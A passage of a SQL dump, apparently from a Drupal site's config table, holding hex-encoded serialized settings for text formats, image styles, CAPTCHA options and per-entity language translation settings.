('', 'filter.format.full_html', 0x613a393a7b733a343a2275756964223b733a33363a2265626161373232302d653438652d343935312d393237332d303236333562313537323136223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a363a22656469746f72223b693a313b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22574e654b354662635938705867457062445f4b67527a6c46312d35504c33424a5877716142637450547177223b7d733a343a226e616d65223b733a393a2246756c6c2048544d4c223b733a363a22666f726d6174223b733a393a2266756c6c5f68746d6c223b733a363a22776569676874223b693a323b733a373a2266696c74657273223b613a373a7b733a32313a22656469746f725f66696c655f7265666572656e6365223b613a353a7b733a323a226964223b733a32313a22656469746f725f66696c655f7265666572656e6365223b733a383a2270726f7669646572223b733a363a22656469746f72223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a31313b733a383a2273657474696e6773223b613a303a7b7d7d733a31323a2266696c7465725f616c69676e223b613a353a7b733a323a226964223b733a31323a2266696c7465725f616c69676e223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a383b733a383a2273657474696e6773223b613a303a7b7d7d733a31343a2266696c7465725f63617074696f6e223b613a353a7b733a323a226964223b733a31343a2266696c7465725f63617074696f6e223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a393b733a383a2273657474696e6773223b613a303a7b7d7d733a31313a2266696c7465725f68746d6c223b613a353a7b733a323a226964223b733a31313a2266696c7465725f68746d6c223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a303b733a363a22776569676874223b693a2d31303b733a383a2273657474696e6773223b613a333a7b733a31323a22616c6c6f7765645f68746d6c223b733a303a22223b733a31363a2266696c7465725f68746d6c5f68656c70223b623a313b733a32303a2266696c7465725f68746d6c5f6e6f666f6c6c6f77223b623a303b7d7d733a32303a2266696c7465725f68746d6c636f72726563746f72223b613a353a7b733a323a226964223b733a32303a2266696c7465725f68746d6c636f72726563746f72223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a31303b733a383a2273657474696e6773223b613a303a7b7d7d733a32323a2266696c7465725f696d6167655f6c617a795f6c6f6164223b613a353a7b733a323a226964223b733a32323a2266696c7465725f696d6167655f6c617a795f6c6f6164223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a31323b733a383a2273657474696e6773223b613a303a7b7d7d733a31313a226d656469615f656d626564223b613a353a7b733a323a226964223b733a31313a226d656469615f656d626564223b733a383a2270726f7669646572223b733a353a226d65646961223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a3130303b733a383a2273657474696e6773223b613a333a7b733a31373a2264656661756c745f766965775f6d6f6465223b733a373a2264656661756c74223b733a31383a22616c6c6f7765645f766965775f6d6f646573223b613a303a7b7d733a31393a22616c6c6f7765645f6d656469615f7479706573223b613a343a7b733a353a22617564696f223b733a353a22617564696f223b733a383a22646f63756d656e74223b733a383a22646f63756d656e74223b733a353a22696d616765223b733a353a22696d616765223b733a353a22766964656f223b733a353a22766964656f223b7d7d7d7d7d),
('', 'filter.format.plain_text', 0x613a393a7b733a343a2275756964223b733a33363a2264323366393265642d623666372d343137622d626462372d306338333131386330643862223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224e494b4274366b775f7550684e493071745232446e5266376d534f674151647837513934534b4d6a586251223b7d733a343a226e616d65223b733a31303a22506c61696e2074657874223b733a363a22666f726d6174223b733a31303a22706c61696e5f74657874223b733a363a22776569676874223b693a31303b733a373a2266696c74657273223b613a333a7b733a31323a2266696c7465725f6175746f70223b613a353a7b733a323a226964223b733a31323a2266696c7465725f6175746f70223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a303b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a2266696c7465725f68746d6c5f657363617065223b613a353a7b733a323a226964223b733a31383a2266696c7465725f68746d6c5f657363617065223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a2d31303b733a383a2273657474696e6773223b613a303a7b7d7d733a31303a2266696c7465725f75726c223b613a353a7b733a323a226964223b733a31303a2266696c7465725f75726c223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a303b733a383a2273657474696e6773223b613a313a7b733a31373a2266696c7465725f75726c5f6c656e677468223b693a37323b7d7d7d7d),
('', 'filter.format.restricted_html', 0x613a393a7b733a343a2275756964223b733a33363a2236663139663764612d393234612d343565632d613433392d386136353963653562313233223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226f7a364e7950444142344842364e39686748324c774e567443642d7358624d473166626e354b7352494449223b7d733a343a226e616d65223b733a31353a22526573747269637465642048544d4c223b733a363a22666f726d6174223b733a31353a22726573747269637465645f68746d6c223b733a363a22776569676874223b693a313b733a373a2266696c74657273223b613a333a7b733a31323a2266696c7465725f6175746f70223b613a353a7b733a323a226964223b733a31323a2266696c7465725f6175746f70223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a303b733a383a2273657474696e6773223b613a303a7b7d7d733a31313a2266696c7465725f68746d6c223b613a353a7b733a323a226964223b733a31313a2266696c7465725f68746d6c223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a2d31303b733a383a2273657474696e6773223b613a333a7b733a31323a22616c6c6f7765645f68746d6c223b733a3134393a223c61206872656620687265666c616e673e203c656d3e203c7374726f6e673e203c636974653e203c626c6f636b71756f746520636974653e203c636f64653e203c756c20747970653e203c6f6c20737461727420747970653e203c6c693e203c646c3e203c64743e203c64643e203c68322069643e203c68332069643e203c68342069643e203c68352069643e203c68362069643e223b733a31363a2266696c7465725f68746d6c5f68656c70223b623a313b733a32303a2266696c7465725f68746d6c5f6e6f666f6c6c6f77223b623a303b7d7d733a31303a2266696c7465725f75726c223b613a353a7b733a323a226964223b733a31303a2266696c7465725f75726c223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a303b733a383a2273657474696e6773223b613a313a7b733a31373a2266696c7465725f75726c5f6c656e677468223b693a37323b7d7d7d7d),
('', 'filter.settings', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224669506a4d335764425f5f72754641374236544c776e695f55635a626d656b354734623264785149747841223b7d733a31353a2266616c6c6261636b5f666f726d6174223b733a31303a22706c61696e5f74657874223b733a32373a22616c776179735f73686f775f66616c6c6261636b5f63686f696365223b623a303b7d),
('', 'image.settings', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226b2d7944464862714e6670652d537267347364435371616f73436c32443875777945593565734638674577223b7d733a31333a22707265766965775f696d616765223b733a32393a22636f72652f6d6f64756c65732f696d6167652f73616d706c652e706e67223b733a32363a22616c6c6f775f696e7365637572655f6465726976617469766573223b623a303b733a32303a2273757070726573735f69746f6b5f6f7574707574223b623a303b7d),
('', 'image.style.about_img', 0x613a373a7b733a343a2275756964223b733a33363a2231366163333761632d663139302d343931332d626437332d613835333231383631386564223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a343a226e616d65223b733a393a2261626f75745f696d67223b733a353a226c6162656c223b733a393a2261626f75742d696d67223b733a373a2265666665637473223b613a313a7b733a33363a2232613733636637342d323433612d346534622d613465662d646531643064636533306638223b613a343a7b733a343a2275756964223b733a33363a2232613733636637342d323433612d346534622d613465662d646531643064636533306638223b733a323a226964223b733a32303a22696d6167655f7363616c655f616e645f63726f70223b733a363a22776569676874223b693a313b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3237353b733a363a22686569676874223b693a3133353b733a363a22616e63686f72223b733a31333a2263656e7465722d63656e746572223b7d7d7d7d),
('', 'image.style.announce_img', 0x613a373a7b733a343a2275756964223b733a33363a2261316538363233372d653835362d343638652d396137382d376439366465383334363137223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a343a226e616d65223b733a31323a22616e6e6f756e63655f696d67223b733a353a226c6162656c223b733a31323a22616e6e6f756e63652d696d67223b733a373a2265666665637473223b613a313a7b733a33363a2231363264623461342d373236662d343939652d623436382d383836303565343636343064223b613a343a7b733a343a2275756964223b733a33363a2231363264623461342d373236662d343939652d623436382d383836303565343636343064223b733a323a226964223b733a32303a22696d6167655f7363616c655f616e645f63726f70223b733a363a22776569676874223b693a313b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3337383b733a363a22686569676874223b693a3233323b733a363a22616e63686f72223b733a31333a2263656e7465722d63656e746572223b7d7d7d7d),
('', 'image.style.large', 0x613a383a7b733a343a2275756964223b733a33363a2239316438393665332d363966332d343861392d396337302d393864363132313738303632223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224a326e305270467a53302d62675379786a73367253646778423172622d625441677179774e785f3936344d223b7d733a343a226e616d65223b733a353a226c61726765223b733a353a226c6162656c223b733a31363a224c617267652028343830c39734383029223b733a373a2265666665637473223b613a313a7b733a33363a2264646437336161372d346264362d346338352d623630302d626466326231363238643164223b613a343a7b733a343a2275756964223b733a33363a2264646437336161372d346264362d346338352d623630302d626466326231363238643164223b733a323a226964223b733a31313a22696d6167655f7363616c65223b733a363a22776569676874223b693a303b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3438303b733a363a22686569676874223b693a3438303b733a373a2275707363616c65223b623a303b7d7d7d7d),
('', 'image.style.media_library', 0x613a383a7b733a343a2275756964223b733a33363a2234663532643537312d333062302d343066322d393333662d633561343939356133313330223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a383a22656e666f72636564223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a31333a226d656469615f6c696272617279223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2237714a71546f44314f514c4179657377706d67374d304c5278516c77315552516b4a4457554a436e6d5238223b7d733a343a226e616d65223b733a31333a226d656469615f6c696272617279223b733a353a226c6162656c223b733a33343a224d65646961204c696272617279207468756d626e61696c2028323230c39732323029223b733a373a2265666665637473223b613a313a7b733a33363a2237356230373661382d313233342d346234322d383564622d626633373763346438643566223b613a343a7b733a343a2275756964223b733a33363a2237356230373661382d313233342d346234322d383564622d626633373763346438643566223b733a323a226964223b733a31313a22696d6167655f7363616c65223b733a363a22776569676874223b693a303b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3232303b733a363a22686569676874223b693a3232303b733a373a2275707363616c65223b623a303b7d7d7d7d),
('', 'image.style.medium', 0x613a383a7b733a343a2275756964223b733a33363a2239393163333162312d613435372d343336312d626237372d333966316238383462393562223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2259394e6d6e5a485171323041535379544e41364a6e777457724a4a6953616a4f65684744746d5546644d30223b7d733a343a226e616d65223b733a363a226d656469756d223b733a353a226c6162656c223b733a31373a224d656469756d2028323230c39732323029223b733a373a2265666665637473223b613a313a7b733a33363a2262646466306430362d343266392d346337352d613730302d613333636166613235656130223b613a343a7b733a343a2275756964223b733a33363a2262646466306430362d343266392d346337352d613730302d613333636166613235656130223b733a323a226964223b733a31313a22696d6167655f7363616c65223b733a363a22776569676874223b693a303b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3232303b733a363a22686569676874223b693a3232303b733a373a2275707363616c65223b623a303b7d7d7d7d),
('', 'image.style.slider_img', 0x613a373a7b733a343a2275756964223b733a33363a2233653533623139382d613036332d346537372d386130332d633639393131326462353735223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a343a226e616d65223b733a31303a22736c696465725f696d67223b733a353a226c6162656c223b733a31303a22736c696465722d696d67223b733a373a2265666665637473223b613a313a7b733a33363a2266393631623332372d366430302d346662642d623662632d303662613262636565353436223b613a343a7b733a343a2275756964223b733a33363a2266393631623332372d366430302d346662642d623662632d303662613262636565353436223b733a323a226964223b733a32303a22696d6167655f7363616c655f616e645f63726f70223b733a363a22776569676874223b693a313b733a343a2264617461223b613a333a7b733a353a227769647468223b693a313230303b733a363a22686569676874223b693a3530303b733a363a22616e63686f72223b733a31333a2263656e7465722d63656e746572223b7d7d7d7d),
('', 'image.style.thumbnail', 0x613a383a7b733a343a2275756964223b733a33363a2263333034346465332d356634342d343961372d613733382d333439623963353431396235223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2263436957644248674c776a356f6d4733356c734b63344c6b57344d42646d6363746b566f70346f6c357830223b7d733a343a226e616d65223b733a393a227468756d626e61696c223b733a353a226c6162656c223b733a32303a225468756d626e61696c2028313030c39731303029223b733a373a2265666665637473223b613a313a7b733a33363a2231636665633239382d383632302d343734392d623130302d636362366334353030373739223b613a343a7b733a343a2275756964223b733a33363a2231636665633239382d383632302d343734392d623130302d636362366334353030373739223b733a323a226964223b733a31313a22696d6167655f7363616c65223b733a363a22776569676874223b693a303b733a343a2264617461223b613a333a7b733a353a227769647468223b693a3130303b733a363a22686569676874223b693a3130303b733a373a2275707363616c65223b623a303b7d7d7d7d),
('', 'image.style.wide', 0x613a383a7b733a343a2275756964223b733a33363a2235653231323865322d343535312d343263372d613863612d636262353637663861653538223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224c737743564c67387a345a6b31753670563144706a3171556a355959324351375f6f6a7837624a5138716b223b7d733a343a226e616d65223b733a343a2277696465223b733a353a226c6162656c223b733a31313a225769646520283130393029223b733a373a2265666665637473223b613a313a7b733a33363a2230393935396331352d353963652d346636642d393064662d653264376366333262636535223b613a343a7b733a343a2275756964223b733a33363a2230393935396331352d353963652d346636642d393064662d653264376366333262636535223b733a323a226964223b733a31313a22696d6167655f7363616c65223b733a363a22776569676874223b693a313b733a343a2264617461223b613a333a7b733a353a227769647468223b693a313039303b733a363a22686569676874223b4e3b733a373a2275707363616c65223b623a303b7d7d7d7d),
('', 'image_captcha.settings', 0x613a31373a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2250424a4150524171482d7730306a4155586244397156366672565433387449316f585a6942496a56386755223b7d733a33373a22696d6167655f636170746368615f666f6e74735f707265766965775f6d61705f6361636865223b613a303a7b7d733a31393a22696d6167655f636170746368615f666f6e7473223b613a323a7b693a303b733a36343a2230353962323236663236376564636464646334616161393865613839363133353532353336626137323834666564396563633438313539343666646139303631223b693a313b733a36343a2262656230666333643161346464366539343634636135396631383731643330656266663633613736643539376661623537356664343861613530303431316638223b7d733a32333a22696d6167655f636170746368615f666f6e745f73697a65223b693a33303b733a33313a22696d6167655f636170746368615f6368617261637465725f73706163696e67223b733a333a22312e32223b733a33333a22696d6167655f636170746368615f696d6167655f616c6c6f7765645f6368617273223b733a33393a2261416242436445654666474868696a4b4c4d6d4e505152725354745758595a3233343536373839223b733a32353a22696d6167655f636170746368615f636f64655f6c656e677468223b693a353b733a32353a22696d6167655f636170746368615f72746c5f737570706f7274223b693a303b733a33303a22696d6167655f636170746368615f6261636b67726f756e645f636f6c6f72223b733a373a2223666666666666223b733a33303a22696d6167655f636170746368615f666f726567726f756e645f636f6c6f72223b733a373a2223303030303030223b733a34313a22696d6167655f636170746368615f666f726567726f756e645f636f6c6f725f72616e646f6d6e657373223b693a3130303b733a32353a22696d6167655f636170746368615f66696c655f666f726d6174223b693a313b733a33343a22696d6167655f636170746368615f646973746f7274696f6e5f616d706c6974756465223b693a303b733a33363a22696d6167655f636170746368615f62696c696e6561725f696e746572706f6c6174696f6e223b693a303b733a32333a22696d6167655f636170746368615f646f745f6e6f697365223b693a303b733a32343a22696d6167655f636170746368615f6c696e655f6e6f697365223b693a303b733a32353a22696d6167655f636170746368615f6e6f6973655f6c6576656c223b693a353b7d),
('', 'language.content_settings.block_content.basic', 0x613a31303a7b733a343a2275756964223b733a33363a2233366335383965662d653234642d343431382d626664372d326564313732356336386632223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a22626c6f636b5f636f6e74656e742e747970652e6261736963223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a313b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31393a22626c6f636b5f636f6e74656e742e6261736963223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a31333a227461726765745f62756e646c65223b733a353a226261736963223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.comment.comment', 0x613a31303a7b733a343a2275756964223b733a33363a2265396433303530332d656439362d346237302d383263342d636366653564653631636165223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a22636f6d6d656e742e747970652e636f6d6d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31353a22636f6d6d656e742e636f6d6d656e74223b733a32313a227461726765745f656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a31333a227461726765745f62756e646c65223b733a373a22636f6d6d656e74223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.contact_message.feedback', 0x613a393a7b733a343a2275756964223b733a33363a2264656636393333362d613430342d343231322d623135632d356334633834656132663735223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32313a22636f6e746163742e666f726d2e666565646261636b223b7d7d733a323a226964223b733a32343a22636f6e746163745f6d6573736167652e666565646261636b223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a31333a227461726765745f62756e646c65223b733a383a22666565646261636b223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.contact_message.personal', 0x613a393a7b733a343a2275756964223b733a33363a2239636164383436322d303235372d343031362d623938362d366132303536653163363736223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32313a22636f6e746163742e666f726d2e706572736f6e616c223b7d7d733a323a226964223b733a32343a22636f6e746163745f6d6573736167652e706572736f6e616c223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a31333a227461726765745f62756e646c65223b733a383a22706572736f6e616c223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.file.file', 0x613a393a7b733a343a2275756964223b733a33363a2230303762356536392d333331392d343266642d396535612d343763643134643038363537223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2266696c65223b7d7d733a323a226964223b733a393a2266696c652e66696c65223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a2266696c65223b733a31333a227461726765745f62756e646c65223b733a343a2266696c65223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'language.content_settings.media.audio', 0x613a31303a7b733a343a2275756964223b733a33363a2231386630333539302d343639342d343463622d613363612d373737333064376331386239223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31313a226d656469612e617564696f223b733a32313a227461726765745f656e746974795f747970655f6964223b733a353a226d65646961223b733a31333a227461726765745f62756e646c65223b733a353a22617564696f223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.media.document', 0x613a31303a7b733a343a2275756964223b733a33363a2263666165323561382d663339392d343039662d383931652d383033383130653332393964223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31343a226d656469612e646f63756d656e74223b733a32313a227461726765745f656e746974795f747970655f6964223b733a353a226d65646961223b733a31333a227461726765745f62756e646c65223b733a383a22646f63756d656e74223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.media.image', 0x613a31303a7b733a343a2275756964223b733a33363a2266333236633238352d636137612d346566312d613538392d356663313131363866633965223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31313a226d656469612e696d616765223b733a32313a227461726765745f656e746974795f747970655f6964223b733a353a226d65646961223b733a31333a227461726765745f62756e646c65223b733a353a22696d616765223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.media.remote_video', 0x613a31303a7b733a343a2275756964223b733a33363a2230616566353436332d633165372d343435392d616163362d663138353165666336326166223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31383a226d656469612e72656d6f74655f766964656f223b733a32313a227461726765745f656e746974795f747970655f6964223b733a353a226d65646961223b733a31333a227461726765745f62756e646c65223b733a31323a2272656d6f74655f766964656f223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.media.video', 0x613a31303a7b733a343a2275756964223b733a33363a2263366462396164622d346264352d343930312d623666332d323334623230396566393062223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31313a226d656469612e766964656f223b733a32313a227461726765745f656e746974795f747970655f6964223b733a353a226d65646961223b733a31333a227461726765745f62756e646c65223b733a353a22766964656f223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.menu_link_content.menu_link_content', 0x613a31303a7b733a343a2275756964223b733a33363a2232653439653632302d663266352d343661342d626432642d343331313236646133326432223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b693a313b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a313b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a33353a226d656e755f6c696e6b5f636f6e74656e742e6d656e755f6c696e6b5f636f6e74656e74223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31333a227461726765745f62756e646c65223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.node.activities', 